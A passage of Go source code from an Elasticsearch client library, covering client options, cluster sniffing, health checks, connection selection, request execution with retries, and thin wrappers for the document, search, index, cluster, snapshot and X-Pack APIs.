return func(c *Client) error {
c.gzipEnabled = enabled
return nil
}
}
// SetDecoder sets the Decoder to use when decoding data from Elasticsearch.
// DefaultDecoder is used by default.
func SetDecoder(decoder Decoder) ClientOptionFunc {
return func(c *Client) error {
if decoder != nil {
c.decoder = decoder
} else {
c.decoder = &DefaultDecoder{}
}
return nil
}
}
// SetRequiredPlugins can be used to indicate that some plugins are required
// before a Client will be created.
func SetRequiredPlugins(plugins ...string) ClientOptionFunc {
return func(c *Client) error {
if c.requiredPlugins == nil {
c.requiredPlugins = make([]string, 0)
}
c.requiredPlugins = append(c.requiredPlugins, plugins...)
return nil
}
}
// SetErrorLog sets the logger for critical messages like nodes joining
// or leaving the cluster or failing requests. It is nil by default.
func SetErrorLog(logger Logger) ClientOptionFunc {
return func(c *Client) error {
c.errorlog = logger
return nil
}
}
// SetInfoLog sets the logger for informational messages, e.g. requests
// and their response times. It is nil by default.
func SetInfoLog(logger Logger) ClientOptionFunc {
return func(c *Client) error {
c.infolog = logger
return nil
}
}
// SetTraceLog specifies the log.Logger to use for output of HTTP requests
// and responses which is helpful during debugging. It is nil by default.
func SetTraceLog(logger Logger) ClientOptionFunc {
return func(c *Client) error {
c.tracelog = logger
return nil
}
}
// SetSendGetBodyAs specifies the HTTP method to use when sending a GET request
// with a body. It is GET by default.
func SetSendGetBodyAs(httpMethod string) ClientOptionFunc {
return func(c *Client) error {
c.sendGetBodyAs = httpMethod
return nil
}
}
// SetRetrier specifies the retry strategy that handles errors during
// HTTP request/response with Elasticsearch.
func SetRetrier(retrier Retrier) ClientOptionFunc {
return func(c *Client) error {
if retrier == nil {
retrier = noRetries // no retries by default
}
c.retrier = retrier
return nil
}
}
// SetHeaders adds a list of default HTTP headers that will be added to
// each requests executed by PerformRequest.
func SetHeaders(headers http.Header) ClientOptionFunc {
return func(c *Client) error {
c.headers = headers
return nil
}
}
// String returns a string representation of the client status.
func (c *Client) String() string {
c.connsMu.Lock()
conns := c.conns
c.connsMu.Unlock()
var buf bytes.Buffer
for i, conn := range conns {
if i > 0 {
buf.WriteString(", ")
}
buf.WriteString(conn.String())
}
return buf.String()
}
// IsRunning returns true if the background processes of the client are
// running, false otherwise.
func (c *Client) IsRunning() bool {
c.mu.RLock()
defer c.mu.RUnlock()
return c.running
}
// Start starts the background processes like sniffing the cluster and
// periodic health checks. You don't need to run Start when creating a
// client with NewClient; the background processes are run by default.
//
// If the background processes are already running, this is a no-op.
func (c *Client) Start() {
c.mu.RLock()
if c.running {
c.mu.RUnlock()
return
}
c.mu.RUnlock()
if c.snifferEnabled {
go c.sniffer()
}
if c.healthcheckEnabled {
go c.healthchecker()
}
c.mu.Lock()
c.running = true
c.mu.Unlock()
c.infof("elastic: client started")
}
// Stop stops the background processes that the client is running,
// i.e. sniffing the cluster periodically and running health checks
// on the nodes.
//
// If the background processes are not running, this is a no-op.
func (c *Client) Stop() {
c.mu.RLock()
if !c.running {
c.mu.RUnlock()
return
}
c.mu.RUnlock()
if c.healthcheckEnabled {
c.healthcheckStop <- true
<-c.healthcheckStop
}
if c.snifferEnabled {
c.snifferStop <- true
<-c.snifferStop
}
c.mu.Lock()
c.running = false
c.mu.Unlock()
c.infof("elastic: client stopped")
}
// errorf logs to the error log.
func (c *Client) errorf(format string, args ...interface{}) {
if c.errorlog != nil {
c.errorlog.Printf(format, args...)
}
}
// infof logs informational messages.
func (c *Client) infof(format string, args ...interface{}) {
if c.infolog != nil {
c.infolog.Printf(format, args...)
}
}
// tracef logs to the trace log.
func (c *Client) tracef(format string, args ...interface{}) {
if c.tracelog != nil {
c.tracelog.Printf(format, args...)
}
}
// dumpRequest dumps the given HTTP request to the trace log.
func (c *Client) dumpRequest(r *http.Request) {
if c.tracelog != nil {
out, err := httputil.DumpRequestOut(r, true)
if err == nil {
c.tracef("%s\n", string(out))
}
}
}
// dumpResponse dumps the given HTTP response to the trace log.
func (c *Client) dumpResponse(resp *http.Response) {
if c.tracelog != nil {
out, err := httputil.DumpResponse(resp, true)
if err == nil {
c.tracef("%s\n", string(out))
}
}
}
// sniffer periodically runs sniff.
func (c *Client) sniffer() {
c.mu.RLock()
timeout := c.snifferTimeout
interval := c.snifferInterval
c.mu.RUnlock()
ticker := time.NewTicker(interval)
defer ticker.Stop()
for {
select {
case <-c.snifferStop:
// we are asked to stop, so we signal back that we're stopping now
c.snifferStop <- true
return
case <-ticker.C:
c.sniff(context.Background(), timeout)
}
}
}
// sniff uses the Node Info API to return the list of nodes in the cluster.
// It uses the list of URLs passed on startup plus the list of URLs found
// by the preceding sniffing process (if sniffing is enabled).
//
// If sniffing is disabled, this is a no-op.
func (c *Client) sniff(parentCtx context.Context, timeout time.Duration) error {
c.mu.RLock()
if !c.snifferEnabled {
c.mu.RUnlock()
return nil
}
// Use all available URLs provided to sniff the cluster.
var urls []string
urlsMap := make(map[string]bool)
// Add all URLs provided on startup
for _, url := range c.urls {
urlsMap[url] = true
urls = append(urls, url)
}
c.mu.RUnlock()
// Add all URLs found by sniffing
c.connsMu.RLock()
for _, conn := range c.conns {
if !conn.IsDead() {
url := conn.URL()
if _, found := urlsMap[url]; !found {
urls = append(urls, url)
}
}
}
c.connsMu.RUnlock()
if len(urls) == 0 {
return errors.Wrap(ErrNoClient, "no URLs found")
}
// Start sniffing on all found URLs
ch := make(chan []*conn, len(urls))
ctx, cancel := context.WithTimeout(parentCtx, timeout)
defer cancel()
for _, url := range urls {
go func(url string) { ch <- c.sniffNode(ctx, url) }(url)
}
// Wait for the results to come back, or the process times out.
for {
select {
case conns := <-ch:
if len(conns) > 0 {
c.updateConns(conns)
return nil
}
case <-ctx.Done():
if err := ctx.Err(); err != nil {
switch {
case IsContextErr(err):
return err
}
return errors.Wrapf(ErrNoClient, "sniff timeout: %v", err)
}
// We get here if no cluster responds in time
return errors.Wrap(ErrNoClient, "sniff timeout")
}
}
}
// sniffNode sniffs a single node. This method is run as a goroutine
// in sniff. If successful, it returns the list of node URLs extracted
// from the result of calling Nodes Info API. Otherwise, an empty array
// is returned.
func (c *Client) sniffNode(ctx context.Context, url string) []*conn {
var nodes []*conn
// Call the Nodes Info API at /_nodes/http
req, err := NewRequest("GET", url+"/_nodes/http")
if err != nil {
return nodes
}
c.mu.RLock()
if c.basicAuth {
req.SetBasicAuth(c.basicAuthUsername, c.basicAuthPassword)
}
c.mu.RUnlock()
res, err := c.c.Do((*http.Request)(req).WithContext(ctx))
if err != nil {
return nodes
}
defer res.Body.Close()
var info NodesInfoResponse
if err := json.NewDecoder(res.Body).Decode(&info); err == nil {
if len(info.Nodes) > 0 {
for nodeID, node := range info.Nodes {
if c.snifferCallback(node) {
if node.HTTP != nil && len(node.HTTP.PublishAddress) > 0 {
url := c.extractHostname(c.scheme, node.HTTP.PublishAddress)
if url != "" {
nodes = append(nodes, newConn(nodeID, url))
}
}
}
}
}
}
return nodes
}
// extractHostname returns the URL from the http.publish_address setting.
func (c *Client) extractHostname(scheme, address string) string {
var (
host string
port string
addrs = strings.Split(address, "/")
ports = strings.Split(address, ":")
)
if len(addrs) > 1 {
host = addrs[0]
} else {
host = strings.Split(addrs[0], ":")[0]
}
port = ports[len(ports)-1]
return fmt.Sprintf("%s://%s:%s", scheme, host, port)
}
// updateConns updates the clients' connections with new information
// gather by a sniff operation.
func (c *Client) updateConns(conns []*conn) {
c.connsMu.Lock()
// Build up new connections:
// If we find an existing connection, use that (including no. of failures etc.).
// If we find a new connection, add it.
var newConns []*conn
for _, conn := range conns {
var found bool
for _, oldConn := range c.conns {
// Notice that e.g. in a Kubernetes cluster the NodeID might be
// stable while the URL has changed.
if oldConn.NodeID() == conn.NodeID() && oldConn.URL() == conn.URL() {
// Take over the old connection
newConns = append(newConns, oldConn)
found = true
break
}
}
if !found {
// New connection didn't exist, so add it to our list of new conns.
c.infof("elastic: %s joined the cluster", conn.URL())
newConns = append(newConns, conn)
}
}
c.conns = newConns
c.cindex = -1
c.connsMu.Unlock()
}
// healthchecker periodically runs healthcheck.
func (c *Client) healthchecker() {
c.mu.RLock()
timeout := c.healthcheckTimeout
interval := c.healthcheckInterval
c.mu.RUnlock()
ticker := time.NewTicker(interval)
defer ticker.Stop()
for {
select {
case <-c.healthcheckStop:
// we are asked to stop, so we signal back that we're stopping now
c.healthcheckStop <- true
return
case <-ticker.C:
c.healthcheck(context.Background(), timeout, false)
}
}
}
// healthcheck does a health check on all nodes in the cluster. Depending on
// the node state, it marks connections as dead, sets them alive etc.
// If healthchecks are disabled and force is false, this is a no-op.
// The timeout specifies how long to wait for a response from Elasticsearch.
func (c *Client) healthcheck(parentCtx context.Context, timeout time.Duration, force bool) {
c.mu.RLock()
if !c.healthcheckEnabled && !force {
c.mu.RUnlock()
return
}
basicAuth := c.basicAuth
basicAuthUsername := c.basicAuthUsername
basicAuthPassword := c.basicAuthPassword
c.mu.RUnlock()
c.connsMu.RLock()
conns := c.conns
c.connsMu.RUnlock()
for _, conn := range conns {
// Run the HEAD request against ES with a timeout
ctx, cancel := context.WithTimeout(parentCtx, timeout)
defer cancel()
// Goroutine executes the HTTP request, returns an error and sets status
var status int
errc := make(chan error, 1)
go func(url string) {
req, err := NewRequest("HEAD", url)
if err != nil {
errc <- err
return
}
if basicAuth {
req.SetBasicAuth(basicAuthUsername, basicAuthPassword)
}
res, err := c.c.Do((*http.Request)(req).WithContext(ctx))
if res != nil {
status = res.StatusCode
if res.Body != nil {
res.Body.Close()
}
}
errc <- err
}(conn.URL())
// Wait for the Goroutine (or its timeout)
select {
case <-ctx.Done(): // timeout
c.errorf("elastic: %s is dead", conn.URL())
conn.MarkAsDead()
case err := <-errc:
if err != nil {
c.errorf("elastic: %s is dead", conn.URL())
conn.MarkAsDead()
break
}
if status >= 200 && status < 300 {
conn.MarkAsAlive()
} else {
conn.MarkAsDead()
c.errorf("elastic: %s is dead [status=%d]", conn.URL(), status)
}
}
}
}
// startupHealthcheck is used at startup to check if the server is available
// at all.
func (c *Client) startupHealthcheck(parentCtx context.Context, timeout time.Duration) error {
c.mu.Lock()
urls := c.urls
basicAuth := c.basicAuth
basicAuthUsername := c.basicAuthUsername
basicAuthPassword := c.basicAuthPassword
c.mu.Unlock()
// If we don't get a connection after "timeout", we bail.
var lastErr error
start := time.Now()
done := false
for !done {
for _, url := range urls {
req, err := http.NewRequest("HEAD", url, nil)
if err != nil {
return err
}
if basicAuth {
req.SetBasicAuth(basicAuthUsername, basicAuthPassword)
}
ctx, cancel := context.WithTimeout(parentCtx, timeout)
defer cancel()
req = req.WithContext(ctx)
res, err := c.c.Do(req)
if err == nil && res != nil && res.StatusCode >= 200 && res.StatusCode < 300 {
return nil
} else if err != nil {
lastErr = err
}
}
select {
case <-parentCtx.Done():
lastErr = parentCtx.Err()
done = true
case <-time.After(1 * time.Second):
if time.Since(start) > timeout {
done = true
}
}
}
if lastErr != nil {
if IsContextErr(lastErr) {
return lastErr
}
return errors.Wrapf(ErrNoClient, "health check timeout: %v", lastErr)
}
return errors.Wrap(ErrNoClient, "health check timeout")
}
// next returns the next available connection, or ErrNoClient.
func (c *Client) next() (*conn, error) {
// We do round-robin here.
// TODO(oe) This should be a pluggable strategy, like the Selector in the official clients.
c.connsMu.Lock()
defer c.connsMu.Unlock()
i := 0
numConns := len(c.conns)
for {
i++
if i > numConns {
break // we visited all conns: they all seem to be dead
}
c.cindex++
if c.cindex >= numConns {
c.cindex = 0
}
conn := c.conns[c.cindex]
if !conn.IsDead() {
return conn, nil
}
}
// We have a deadlock here: All nodes are marked as dead.
// If sniffing is disabled, connections will never be marked alive again.
// So we are marking them as alive--if sniffing is disabled.
// They'll then be picked up in the next call to PerformRequest.
if !c.snifferEnabled {
c.errorf("elastic: all %d nodes marked as dead; resurrecting them to prevent deadlock", len(c.conns))
for _, conn := range c.conns {
conn.MarkAsAlive()
}
}
// We tried hard, but there is no node available
return nil, errors.Wrap(ErrNoClient, "no available connection")
}
// mustActiveConn returns nil if there is an active connection,
// otherwise ErrNoClient is returned.
func (c *Client) mustActiveConn() error {
c.connsMu.Lock()
defer c.connsMu.Unlock()
for _, c := range c.conns {
if !c.IsDead() {
return nil
}
}
return errors.Wrap(ErrNoClient, "no active connection found")
}
// -- PerformRequest --
// PerformRequestOptions must be passed into PerformRequest.
type PerformRequestOptions struct {
Method string
Path string
Params url.Values
Body interface{}
ContentType string
IgnoreErrors []int
Retrier Retrier
Headers http.Header
MaxResponseSize int64
}
// PerformRequest does a HTTP request to Elasticsearch.
// It returns a response (which might be nil) and an error on failure.
//
// Optionally, a list of HTTP error codes to ignore can be passed.
// This is necessary for services that expect e.g. HTTP status 404 as a
// valid outcome (Exists, IndicesExists, IndicesTypeExists).
func (c *Client) PerformRequest(ctx context.Context, opt PerformRequestOptions) (*Response, error) {
start := time.Now().UTC()
c.mu.RLock()
timeout := c.healthcheckTimeout
basicAuth := c.basicAuth
basicAuthUsername := c.basicAuthUsername
basicAuthPassword := c.basicAuthPassword
sendGetBodyAs := c.sendGetBodyAs
gzipEnabled := c.gzipEnabled
healthcheckEnabled := c.healthcheckEnabled
retrier := c.retrier
if opt.Retrier != nil {
retrier = opt.Retrier
}
defaultHeaders := c.headers
c.mu.RUnlock()
var err error
var conn *conn
var req *Request
var resp *Response
var retried bool
var n int
// Change method if sendGetBodyAs is specified.
if opt.Method == "GET" && opt.Body != nil && sendGetBodyAs != "GET" {
opt.Method = sendGetBodyAs
}
for {
pathWithParams := opt.Path
if len(opt.Params) > 0 {
pathWithParams += "?" + opt.Params.Encode()
}
// Get a connection
conn, err = c.next()
if errors.Cause(err) == ErrNoClient {
n++
if !retried {
// Force a healtcheck as all connections seem to be dead.
c.healthcheck(ctx, timeout, false)
if healthcheckEnabled {
retried = true
continue
}
}
wait, ok, rerr := retrier.Retry(ctx, n, nil, nil, err)
if rerr != nil {
return nil, rerr
}
if !ok {
return nil, err
}
retried = true
time.Sleep(wait)
continue // try again
}
if err != nil {
c.errorf("elastic: cannot get connection from pool")
return nil, err
}
req, err = NewRequest(opt.Method, conn.URL()+pathWithParams)
if err != nil {
c.errorf("elastic: cannot create request for %s %s: %v", strings.ToUpper(opt.Method), conn.URL()+pathWithParams, err)
return nil, err
}
if basicAuth {
req.SetBasicAuth(basicAuthUsername, basicAuthPassword)
}
if opt.ContentType != "" {
req.Header.Set("Content-Type", opt.ContentType)
}
if len(opt.Headers) > 0 {
for key, value := range opt.Headers {
for _, v := range value {
req.Header.Add(key, v)
}
}
}
if len(defaultHeaders) > 0 {
for key, value := range defaultHeaders {
for _, v := range value {
req.Header.Add(key, v)
}
}
}
// Set body
if opt.Body != nil {
err = req.SetBody(opt.Body, gzipEnabled)
if err != nil {
c.errorf("elastic: couldn't set body %+v for request: %v", opt.Body, err)
return nil, err
}
}
// Tracing
c.dumpRequest((*http.Request)(req))
// Get response
res, err := c.c.Do((*http.Request)(req).WithContext(ctx))
if IsContextErr(err) {
// Proceed, but don't mark the node as dead
return nil, err
}
if err != nil {
n++
wait, ok, rerr := retrier.Retry(ctx, n, (*http.Request)(req), res, err)
if rerr != nil {
c.errorf("elastic: %s is dead", conn.URL())
conn.MarkAsDead()
return nil, rerr
}
if !ok {
c.errorf("elastic: %s is dead", conn.URL())
conn.MarkAsDead()
return nil, err
}
retried = true
time.Sleep(wait)
continue // try again
}
defer res.Body.Close()
// Tracing
c.dumpResponse(res)
// Log deprecation warnings as errors
if len(res.Header["Warning"]) > 0 {
c.deprecationlog((*http.Request)(req), res)
for _, warning := range res.Header["Warning"] {
c.errorf("Deprecation warning: %s", warning)
}
}
// Check for errors
if err := checkResponse((*http.Request)(req), res, opt.IgnoreErrors...); err != nil {
// No retry if request succeeded
// We still try to return a response.
resp, _ = c.newResponse(res, opt.MaxResponseSize)
return resp, err
}
// We successfully made a request with this connection
conn.MarkAsHealthy()
resp, err = c.newResponse(res, opt.MaxResponseSize)
if err != nil {
return nil, err
}
break
}
duration := time.Now().UTC().Sub(start)
c.infof("%s %s [status:%d, request:%.3fs]",
strings.ToUpper(opt.Method),
req.URL,
resp.StatusCode,
float64(int64(duration/time.Millisecond))/1000)
return resp, nil
}
// -- Document APIs --
// Index a document.
func (c *Client) Index() *IndexService {
return NewIndexService(c)
}
// Get a document.
func (c *Client) Get() *GetService {
return NewGetService(c)
}
// MultiGet retrieves multiple documents in one roundtrip.
func (c *Client) MultiGet() *MgetService {
return NewMgetService(c)
}
// Mget retrieves multiple documents in one roundtrip.
func (c *Client) Mget() *MgetService {
return NewMgetService(c)
}
// Delete a document.
func (c *Client) Delete() *DeleteService {
return NewDeleteService(c)
}
// DeleteByQuery deletes documents as found by a query.
func (c *Client) DeleteByQuery(indices ...string) *DeleteByQueryService {
return NewDeleteByQueryService(c).Index(indices...)
}
// Update a document.
func (c *Client) Update() *UpdateService {
return NewUpdateService(c)
}
// UpdateByQuery performs an update on a set of documents.
func (c *Client) UpdateByQuery(indices ...string) *UpdateByQueryService {
return NewUpdateByQueryService(c).Index(indices...)
}
// Bulk is the entry point to mass insert/update/delete documents.
func (c *Client) Bulk() *BulkService {
return NewBulkService(c)
}
// BulkProcessor allows setting up a concurrent processor of bulk requests.
func (c *Client) BulkProcessor() *BulkProcessorService {
return NewBulkProcessorService(c)
}
// Reindex copies data from a source index into a destination index.
//
// See https://www.elastic.co/guide/en/elasticsearch/reference/7.0/docs-reindex.html
// for details on the Reindex API.
func (c *Client) Reindex() *ReindexService {
return NewReindexService(c)
}
// TermVectors returns information and statistics on terms in the fields
// of a particular document.
func (c *Client) TermVectors(index string) *TermvectorsService {
builder := NewTermvectorsService(c)
builder = builder.Index(index)
return builder
}
// MultiTermVectors returns information and statistics on terms in the fields
// of multiple documents.
func (c *Client) MultiTermVectors() *MultiTermvectorService {
return NewMultiTermvectorService(c)
}
// -- Search APIs --
// Search is the entry point for searches.
func (c *Client) Search(indices ...string) *SearchService {
return NewSearchService(c).Index(indices...)
}
// MultiSearch is the entry point for multi searches.
func (c *Client) MultiSearch() *MultiSearchService {
return NewMultiSearchService(c)
}
// Count documents.
func (c *Client) Count(indices ...string) *CountService {
return NewCountService(c).Index(indices...)
}
// Explain computes a score explanation for a query and a specific document.
func (c *Client) Explain(index, typ, id string) *ExplainService {
return NewExplainService(c).Index(index).Type(typ).Id(id)
}
// TODO Search Template
// TODO Search Exists API
// Validate allows a user to validate a potentially expensive query without executing it.
func (c *Client) Validate(indices ...string) *ValidateService {
return NewValidateService(c).Index(indices...)
}
// SearchShards returns statistical information about nodes and shards.
func (c *Client) SearchShards(indices ...string) *SearchShardsService {
return NewSearchShardsService(c).Index(indices...)
}
// FieldCaps returns statistical information about fields in indices.
func (c *Client) FieldCaps(indices ...string) *FieldCapsService {
return NewFieldCapsService(c).Index(indices...)
}
// Exists checks if a document exists.
func (c *Client) Exists() *ExistsService {
return NewExistsService(c)
}
// Scroll through documents. Use this to efficiently scroll through results
// while returning the results to a client.
func (c *Client) Scroll(indices ...string) *ScrollService {
return NewScrollService(c).Index(indices...)
}
// ClearScroll can be used to clear search contexts manually.
func (c *Client) ClearScroll(scrollIds ...string) *ClearScrollService {
return NewClearScrollService(c).ScrollId(scrollIds...)
}
// -- Indices APIs --
// CreateIndex returns a service to create a new index.
func (c *Client) CreateIndex(name string) *IndicesCreateService {
return NewIndicesCreateService(c).Index(name)
}
// DeleteIndex returns a service to delete an index.
func (c *Client) DeleteIndex(indices ...string) *IndicesDeleteService {
return NewIndicesDeleteService(c).Index(indices)
}
// IndexExists allows to check if an index exists.
func (c *Client) IndexExists(indices ...string) *IndicesExistsService {
return NewIndicesExistsService(c).Index(indices)
}
// ShrinkIndex returns a service to shrink one index into another.
func (c *Client) ShrinkIndex(source, target string) *IndicesShrinkService {
return NewIndicesShrinkService(c).Source(source).Target(target)
}
// RolloverIndex rolls an alias over to a new index when the existing index
// is considered to be too large or too old.
func (c *Client) RolloverIndex(alias string) *IndicesRolloverService {
return NewIndicesRolloverService(c).Alias(alias)
}
// IndexStats provides statistics on different operations happining
// in one or more indices.
func (c *Client) IndexStats(indices ...string) *IndicesStatsService {
return NewIndicesStatsService(c).Index(indices...)
}
// OpenIndex opens an index.
func (c *Client) OpenIndex(name string) *IndicesOpenService {
return NewIndicesOpenService(c).Index(name)
}
// CloseIndex closes an index.
func (c *Client) CloseIndex(name string) *IndicesCloseService {
return NewIndicesCloseService(c).Index(name)
}
// FreezeIndex freezes an index.
func (c *Client) FreezeIndex(name string) *IndicesFreezeService {
return NewIndicesFreezeService(c).Index(name)
}
// UnfreezeIndex unfreezes an index.
func (c *Client) UnfreezeIndex(name string) *IndicesUnfreezeService {
return NewIndicesUnfreezeService(c).Index(name)
}
// IndexGet retrieves information about one or more indices.
// IndexGet is only available for Elasticsearch 1.4 or later.
func (c *Client) IndexGet(indices ...string) *IndicesGetService {
return NewIndicesGetService(c).Index(indices...)
}
// IndexGetSettings retrieves settings of all, one or more indices.
func (c *Client) IndexGetSettings(indices ...string) *IndicesGetSettingsService {
return NewIndicesGetSettingsService(c).Index(indices...)
}
// IndexPutSettings sets settings for all, one or more indices.
func (c *Client) IndexPutSettings(indices ...string) *IndicesPutSettingsService {
return NewIndicesPutSettingsService(c).Index(indices...)
}
// IndexSegments retrieves low level segment information for all, one or more indices.
func (c *Client) IndexSegments(indices ...string) *IndicesSegmentsService {
return NewIndicesSegmentsService(c).Index(indices...)
}
// IndexAnalyze performs the analysis process on a text and returns the
// token breakdown of the text.
func (c *Client) IndexAnalyze() *IndicesAnalyzeService {
return NewIndicesAnalyzeService(c)
}
// Forcemerge optimizes one or more indices.
// It replaces the deprecated Optimize API.
func (c *Client) Forcemerge(indices ...string) *IndicesForcemergeService {
return NewIndicesForcemergeService(c).Index(indices...)
}
// Refresh asks Elasticsearch to refresh one or more indices.
func (c *Client) Refresh(indices ...string) *RefreshService {
return NewRefreshService(c).Index(indices...)
}
// Flush asks Elasticsearch to free memory from the index and
// flush data to disk.
func (c *Client) Flush(indices ...string) *IndicesFlushService {
return NewIndicesFlushService(c).Index(indices...)
}
// SyncedFlush performs a synced flush.
//
// See https://www.elastic.co/guide/en/elasticsearch/reference/7.0/indices-synced-flush.html
// for more details on synched flushes and how they differ from a normal
// Flush.
func (c *Client) SyncedFlush(indices ...string) *IndicesSyncedFlushService {
return NewIndicesSyncedFlushService(c).Index(indices...)
}
// ClearCache clears caches for one or more indices.
func (c *Client) ClearCache(indices ...string) *IndicesClearCacheService {
return NewIndicesClearCacheService(c).Index(indices...)
}
// Alias enables the caller to add and/or remove aliases.
func (c *Client) Alias() *AliasService {
return NewAliasService(c)
}
// Aliases returns aliases by index name(s).
func (c *Client) Aliases() *AliasesService {
return NewAliasesService(c)
}
// IndexGetTemplate gets an index template.
// Use XXXTemplate funcs to manage search templates.
func (c *Client) IndexGetTemplate(names ...string) *IndicesGetTemplateService {
return NewIndicesGetTemplateService(c).Name(names...)
}
// IndexTemplateExists gets check if an index template exists.
// Use XXXTemplate funcs to manage search templates.
func (c *Client) IndexTemplateExists(name string) *IndicesExistsTemplateService {
return NewIndicesExistsTemplateService(c).Name(name)
}
// IndexPutTemplate creates or updates an index template.
// Use XXXTemplate funcs to manage search templates.
func (c *Client) IndexPutTemplate(name string) *IndicesPutTemplateService {
return NewIndicesPutTemplateService(c).Name(name)
}
// IndexDeleteTemplate deletes an index template.
// Use XXXTemplate funcs to manage search templates.
func (c *Client) IndexDeleteTemplate(name string) *IndicesDeleteTemplateService {
return NewIndicesDeleteTemplateService(c).Name(name)
}
// GetMapping gets a mapping.
func (c *Client) GetMapping() *IndicesGetMappingService {
return NewIndicesGetMappingService(c)
}
// PutMapping registers a mapping.
func (c *Client) PutMapping() *IndicesPutMappingService {
return NewIndicesPutMappingService(c)
}
// GetFieldMapping gets mapping for fields.
func (c *Client) GetFieldMapping() *IndicesGetFieldMappingService {
return NewIndicesGetFieldMappingService(c)
}
// -- cat APIs --
// TODO cat fielddata
// TODO cat master
// TODO cat nodes
// TODO cat pending tasks
// TODO cat plugins
// TODO cat recovery
// TODO cat thread pool
// TODO cat shards
// TODO cat segments
// CatAliases returns information about aliases.
func (c *Client) CatAliases() *CatAliasesService {
return NewCatAliasesService(c)
}
// CatAllocation returns information about the allocation across nodes.
func (c *Client) CatAllocation() *CatAllocationService {
return NewCatAllocationService(c)
}
// CatCount returns document counts for indices.
func (c *Client) CatCount() *CatCountService {
return NewCatCountService(c)
}
// CatHealth returns information about cluster health.
func (c *Client) CatHealth() *CatHealthService {
return NewCatHealthService(c)
}
// CatIndices returns information about indices.
func (c *Client) CatIndices() *CatIndicesService {
return NewCatIndicesService(c)
}
// -- Ingest APIs --
// IngestPutPipeline adds pipelines and updates existing pipelines in
// the cluster.
func (c *Client) IngestPutPipeline(id string) *IngestPutPipelineService {
return NewIngestPutPipelineService(c).Id(id)
}
// IngestGetPipeline returns pipelines based on ID.
func (c *Client) IngestGetPipeline(ids ...string) *IngestGetPipelineService {
return NewIngestGetPipelineService(c).Id(ids...)
}
// IngestDeletePipeline deletes a pipeline by ID.
func (c *Client) IngestDeletePipeline(id string) *IngestDeletePipelineService {
return NewIngestDeletePipelineService(c).Id(id)
}
// IngestSimulatePipeline executes a specific pipeline against the set of
// documents provided in the body of the request.
func (c *Client) IngestSimulatePipeline() *IngestSimulatePipelineService {
return NewIngestSimulatePipelineService(c)
}
// -- Cluster APIs --
// ClusterHealth retrieves the health of the cluster.
func (c *Client) ClusterHealth() *ClusterHealthService {
return NewClusterHealthService(c)
}
// ClusterReroute allows for manual changes to the allocation of
// individual shards in the cluster.
func (c *Client) ClusterReroute() *ClusterRerouteService {
return NewClusterRerouteService(c)
}
// ClusterState retrieves the state of the cluster.
func (c *Client) ClusterState() *ClusterStateService {
return NewClusterStateService(c)
}
// ClusterStats retrieves cluster statistics.
func (c *Client) ClusterStats() *ClusterStatsService {
return NewClusterStatsService(c)
}
// NodesInfo retrieves one or more or all of the cluster nodes information.
func (c *Client) NodesInfo() *NodesInfoService {
return NewNodesInfoService(c)
}
// NodesStats retrieves one or more or all of the cluster nodes statistics.
func (c *Client) NodesStats() *NodesStatsService {
return NewNodesStatsService(c)
}
// TasksCancel cancels tasks running on the specified nodes.
func (c *Client) TasksCancel() *TasksCancelService {
return NewTasksCancelService(c)
}
// TasksList retrieves the list of tasks running on the specified nodes.
func (c *Client) TasksList() *TasksListService {
return NewTasksListService(c)
}
// TasksGetTask retrieves a task running on the cluster.
func (c *Client) TasksGetTask() *TasksGetTaskService {
return NewTasksGetTaskService(c)
}
// TODO Pending cluster tasks
// TODO Cluster Reroute
// TODO Cluster Update Settings
// TODO Nodes Stats
// TODO Nodes hot_threads
// -- Snapshot and Restore --
// SnapshotStatus returns information about the status of a snapshot.
func (c *Client) SnapshotStatus() *SnapshotStatusService {
return NewSnapshotStatusService(c)
}
// SnapshotCreate creates a snapshot.
func (c *Client) SnapshotCreate(repository string, snapshot string) *SnapshotCreateService {
return NewSnapshotCreateService(c).Repository(repository).Snapshot(snapshot)
}
// SnapshotCreateRepository creates or updates a snapshot repository.
func (c *Client) SnapshotCreateRepository(repository string) *SnapshotCreateRepositoryService {
return NewSnapshotCreateRepositoryService(c).Repository(repository)
}
// SnapshotDelete deletes a snapshot in a snapshot repository.
func (c *Client) SnapshotDelete(repository string, snapshot string) *SnapshotDeleteService {
return NewSnapshotDeleteService(c).Repository(repository).Snapshot(snapshot)
}
// SnapshotDeleteRepository deletes a snapshot repository.
func (c *Client) SnapshotDeleteRepository(repositories ...string) *SnapshotDeleteRepositoryService {
return NewSnapshotDeleteRepositoryService(c).Repository(repositories...)
}
// SnapshotGetRepository gets a snapshot repository.
func (c *Client) SnapshotGetRepository(repositories ...string) *SnapshotGetRepositoryService {
return NewSnapshotGetRepositoryService(c).Repository(repositories...)
}
// SnapshotGet lists snapshot for a repository.
func (c *Client) SnapshotGet(repository string) *SnapshotGetService {
return NewSnapshotGetService(c).Repository(repository)
}
// SnapshotVerifyRepository verifies a snapshot repository.
func (c *Client) SnapshotVerifyRepository(repository string) *SnapshotVerifyRepositoryService {
return NewSnapshotVerifyRepositoryService(c).Repository(repository)
}
// SnapshotRestore restores the specified indices from a given snapshot
func (c *Client) SnapshotRestore(repository string, snapshot string) *SnapshotRestoreService {
return NewSnapshotRestoreService(c).Repository(repository).Snapshot(snapshot)
}
// -- Scripting APIs --
// GetScript reads a stored script in Elasticsearch.
// Use PutScript for storing a script.
func (c *Client) GetScript() *GetScriptService {
return NewGetScriptService(c)
}
// PutScript allows saving a stored script in Elasticsearch.
func (c *Client) PutScript() *PutScriptService {
return NewPutScriptService(c)
}
// DeleteScript allows removing a stored script from Elasticsearch.
func (c *Client) DeleteScript() *DeleteScriptService {
return NewDeleteScriptService(c)
}
// -- X-Pack General --
// XPackInfo gets information on the xpack plugins enabled on the cluster
func (c *Client) XPackInfo() *XPackInfoService {
return NewXPackInfoService(c)
}
// -- X-Pack Index Lifecycle Management --
// XPackIlmPutLifecycle adds or modifies an ilm policy.
func (c *Client) XPackIlmPutLifecycle() *XPackIlmPutLifecycleService {
return NewXPackIlmPutLifecycleService(c)
}
// XPackIlmGettLifecycle gets an ilm policy.
func (c *Client) XPackIlmGetLifecycle() *XPackIlmGetLifecycleService {
return NewXPackIlmGetLifecycleService(c)
}
// XPackIlmDeleteLifecycle deletes an ilm policy.
func (c *Client) XPackIlmDeleteLifecycle() *XPackIlmDeleteLifecycleService {
return NewXPackIlmDeleteLifecycleService(c)
}
// -- X-Pack Security --
// XPackSecurityGetRoleMapping gets a role mapping.
func (c *Client) XPackSecurityGetRoleMapping(roleMappingName string) *XPackSecurityGetRoleMappingService {
return NewXPackSecurityGetRoleMappingService(c).Name(roleMappingName)
}
// XPackSecurityPutRoleMapping adds a role mapping.
